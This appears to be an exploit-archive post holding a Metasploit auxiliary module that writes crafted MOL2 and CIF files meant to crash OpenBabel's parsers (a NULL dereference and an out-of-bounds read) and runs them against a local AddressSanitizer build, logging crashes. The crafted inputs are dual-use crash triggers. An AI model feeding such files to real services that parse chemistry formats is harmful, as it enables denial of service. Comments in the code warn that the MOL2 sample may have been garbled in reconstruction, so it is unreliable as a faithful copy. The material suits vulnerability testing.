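# =============================================================================
# Title     : OpenBabel 3.1.1 ASan PoC Tester – Metasploit Auxiliary Module
# Author    : indoushka
# Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)
# Vendor    : https://openbabel.org/index.html
# =============================================================================
#
# [+] Summary : This Metasploit auxiliary module generates specially crafted
#     PoC files targeting potential parsing vulnerabilities in OpenBabel
#     (e.g., NULL pointer dereference and out-of-bounds read conditions).
#     The module executes an AddressSanitizer (ASan)-instrumented build of
#     OpenBabel against the generated files to detect crashes, memory
#     corruption issues, or abnormal termination events.
#
# [+] POC :

##
# This module requires Metasploit Framework
# Tested with Metasploit 6.x
##

require 'msf/core'
require 'fileutils'
require 'open3'

# Local regression harness: writes two sample input files into REPRO_DIR,
# runs the binary at BABEL_PATH on every regular file found there, and
# appends the tool's output to LOG_FILE whenever a run exits abnormally or
# prints an AddressSanitizer report. Nothing here talks to a remote host, so
# no exploit mixins are included.
class MetasploitModule < Msf::Auxiliary
  # Registers module metadata and the three datastore options the module reads.
  #
  # @param info [Hash] metadata overrides, merged through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'OpenBabel ASan PoC Tester',
      'Description' => %q{
        This module generates Proof-of-Concept (PoC) files for known OpenBabel
        vulnerabilities and tests them using an AddressSanitizer (ASan) build
        of OpenBabel. It logs crashes for further analysis.
      },
      'Author'      => [ 'Indoushka' ],
      'License'     => MSF_LICENSE
    ))

    register_options(
      [
        OptString.new('BABEL_PATH', [true, 'Path to OpenBabel ASan binary', './obabel']),
        OptString.new('REPRO_DIR', [true, 'Directory to store PoC files', './repro_files']),
        OptString.new('LOG_FILE', [true, 'ASan crash log file', 'asan_report.txt'])
      ]
    )
  end

  # Creates REPRO_DIR if needed and writes repro.mol2 and repro.cif into it.
  # Existing files with those names are overwritten.
  #
  # NOTE(review): the line breaks inside both heredocs were reconstructed from
  # a whitespace-collapsed listing, and the MOL2 section tags are reproduced
  # exactly as that listing shows them. Tripos MOL2 normally writes its record
  # type indicators with an angle-bracket prefix that HTML extraction tends to
  # drop, so compare both files with the original advisory before treating a
  # "No crash detected." result as meaningful.
  def generate_pocs
    repro_dir = datastore['REPRO_DIR']
    FileUtils.mkdir_p(repro_dir)

    mol2_content = <<~MOL2
      @MOLECULE
      Null_Pointer_Exploit
      1 0 0 0 0
      SMALL
      USER_CHARGES
      @ATOM
      1 C 0.0000 0.0000 0.0000 C.3 1 UNL1 0.0000
      @UNITY_ATOM_ATTR
      2 0.5
    MOL2

    cif_content = <<~CIF
      data_oob_read
      _cell_length_a 10.0
      _cell_length_b 10.0
      _cell_length_c 10.0
      loop_
      _space_group_symop_operation_xyz
      'x, y, z'
      'x+1, y+2, z+3, w+4, v+5'
    CIF

    File.write(File.join(repro_dir, 'repro.mol2'), mol2_content)
    File.write(File.join(repro_dir, 'repro.cif'), cif_content)

    print_status("[+] PoC files generated in #{repro_dir}")
  end

  # Runs the OpenBabel binary once on +file_path+ and records abnormal runs.
  #
  # The input format is taken from the file extension. A run counts as a
  # potential crash when the process does not exit with status 0 (including
  # termination by a signal) or when its combined stdout/stderr contains an
  # AddressSanitizer error banner. A non-zero exit can also be an ordinary
  # parse error, so every logged entry still needs manual triage.
  #
  # @param file_path [String] path of the input file to feed to the binary
  # @return [void]
  def run_test(file_path)
    babel = datastore['BABEL_PATH']
    null_dev = Gem.win_platform? ? 'NUL' : '/dev/null'

    input_format = File.extname(file_path).delete('.')
    if input_format.empty?
      # Without an extension there is no format to pass after -i; running
      # anyway would only log the tool's usage error as a "crash".
      print_status("Skipping #{file_path}: no file extension to derive the input format from")
      return
    end

    print_status("Testing file: #{file_path} (#{input_format})")

    asan_env = {
      'ASAN_OPTIONS' => 'symbolize=1:abort_on_error=1:detect_leaks=0'
    }

    begin
      # Pass the environment as a hash and the command as an argument vector:
      # no shell parses the datastore values or file names, so spaces and
      # shell metacharacters in BABEL_PATH or REPRO_DIR cannot alter the
      # command, and ASAN_OPTIONS is also applied on Windows, where a
      # "VAR=value command" prefix is not understood by the command shell.
      result, status = Open3.capture2e(
        asan_env, babel, "-i#{input_format}", file_path, '-osmi', '-O', null_dev
      )

      # success? is nil when the process was killed by a signal (for example
      # the abort requested by abort_on_error=1), which also counts here.
      if !status.success? || result.include?('ERROR: AddressSanitizer')
        print_good("[!] Potential crash detected!")
        File.open(datastore['LOG_FILE'], 'a') do |f|
          f.puts("=" * 60)
          f.puts("File: #{file_path}")
          f.puts("Timestamp: #{Time.now}")
          f.puts("Status: #{status}")
          f.puts(result)
          f.puts("\n")
        end
      else
        print_status("No crash detected.")
      end
    rescue StandardError => e
      # StandardError covers spawn and file errors (Errno::*) while leaving
      # Interrupt and SystemExit alone, so the operator can still stop a run.
      print_error("Error executing test: #{e}")
    end
  end

  # Module entry point: checks that the binary exists, writes the sample
  # files, then tests every regular file in REPRO_DIR.
  #
  # The glob picks up everything already present in REPRO_DIR, not only the
  # two files written by generate_pocs, so point REPRO_DIR at a dedicated
  # directory.
  #
  # @return [void]
  def run
    babel = datastore['BABEL_PATH']
    unless File.exist?(babel)
      print_error("OpenBabel binary not found at #{babel}")
      return
    end

    generate_pocs

    Dir.glob(File.join(datastore['REPRO_DIR'], '*')).each do |file|
      next unless File.file?(file)

      run_test(file)
    end

    print_status("[+] Testing completed. Report saved to #{datastore['LOG_FILE']}")
  end
end

# Greetings to :
# jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)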